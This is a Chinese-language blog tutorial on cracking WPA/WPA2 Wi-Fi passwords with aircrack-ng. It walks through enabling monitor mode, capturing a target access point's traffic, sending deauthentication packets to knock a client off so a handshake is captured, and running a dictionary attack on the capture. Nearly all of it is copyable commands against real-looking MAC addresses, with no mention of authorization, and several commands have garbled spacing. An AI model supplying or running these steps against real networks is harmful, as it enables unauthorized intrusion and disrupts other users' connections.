WAP/WAP2无线网络破解

声明:本文参考了网上的众多资料,加上自己的一晚上的奋斗实际操作总结

其中http://netsecurity.51cto.com/art/201105/264844_all.htm该文写的比较详细,可做参考。

 

1.查看无线网卡状态,激活无线网卡

ifconfig

ifconfig wlan0 up

 

2. 激活无线网卡至monitor即监听模式

airmon-ng start wlan0

 

3. 探测无线网络,抓取无线数据包

在正式抓包之前,一般都是先进行预来探测,来获取当前无线网络概况,包括AP的SSID、MAC地址、工作频道、无线客户端MAC及数量等。

注意:此处的客户端是指无线AP的客户端,并非破解的主机

airodump-ng mon0


 

注意:此处的BSSID为AP的mac,STATION为客户端的mac

找破解的目标是尽量选择排行靠前,且有数据(data)的AP,记下这里的AP和STATION的mac,及信道(CH)

BSSID              STATION             CH

C8:3A:35:2D:5E:78  88:E3:AB:C3:A6:0F    7

airodump-ng -c 7 �Cw abc--bssid C8:3A:35:2D:5E:78 mon0

#对该AP抓取数据包并写入abc文件

-c:该AP的无线信道

-w:表示要写入的文件

--bssid:AP的mac地址

 spacer.gif

 

 

 

4. 进行Deauth攻击加速破解过程。

上面的窗口不关,让其继续抓包,此时重开第二个窗口进行Deauth攻击加速破解过程。

aireplay-ng -0 1 -aC8:3A:35:2D:5E:78 -c 88:E3:AB:C3:A6:0F mon0

运行后可能会出现如下错误

spacer.gif 

根据提示修改命令如下:

aireplay-ng--ignore-negative-one -0 1 -a C8:3A:35:2D:5E:78 -c 88:E3:AB:C3:A6:0F mon0

spacer.gif

 

可以看到不再报错,但是标识部分为【0 |31ACKS】表示没有数据应答,因此需要重复该步骤知道这里有数据应答且第一个窗口出现握手包才行,才可以进行下一步操作,可以调高这里的攻击数字

aireplay-ng--ignore-negative-one -0 10-a C8:3A:35:2D:5E:78 -c 88:E3:AB:C3:A6:0F mon0

注意:该处出现应答数据

spacer.gif

 

且刚才抓包数据的第一个窗口出现握手包,由于该出握手包一闪而过,在第二个窗口进行Deauth攻击需要留心观察第一个窗口(我这里是截图网上的,实际难以截图,一闪而过)

 

spacer.gif

 

5.做完上面关键的一步,接下来是激动人心的破解步骤了,WAP/WAP2均需要字典来破解,请提前下载好字典并放在破解系统上面

aircrack-ng -w beini.txt  abc*.cap

 spacer.gif

-w:接破解的密码字典

abc*.cap 为第一个窗口抓取的数据包

接下来的就是坐等结果,能不能成功看你的字典好坏,对方AP密码难度系数,电脑的破解速度,和一点点运气了


注明:不知道为什么复制不了截图上去,详情请见附件

 

 

 

 


你可能感兴趣的:(破解,WAP,无线网卡)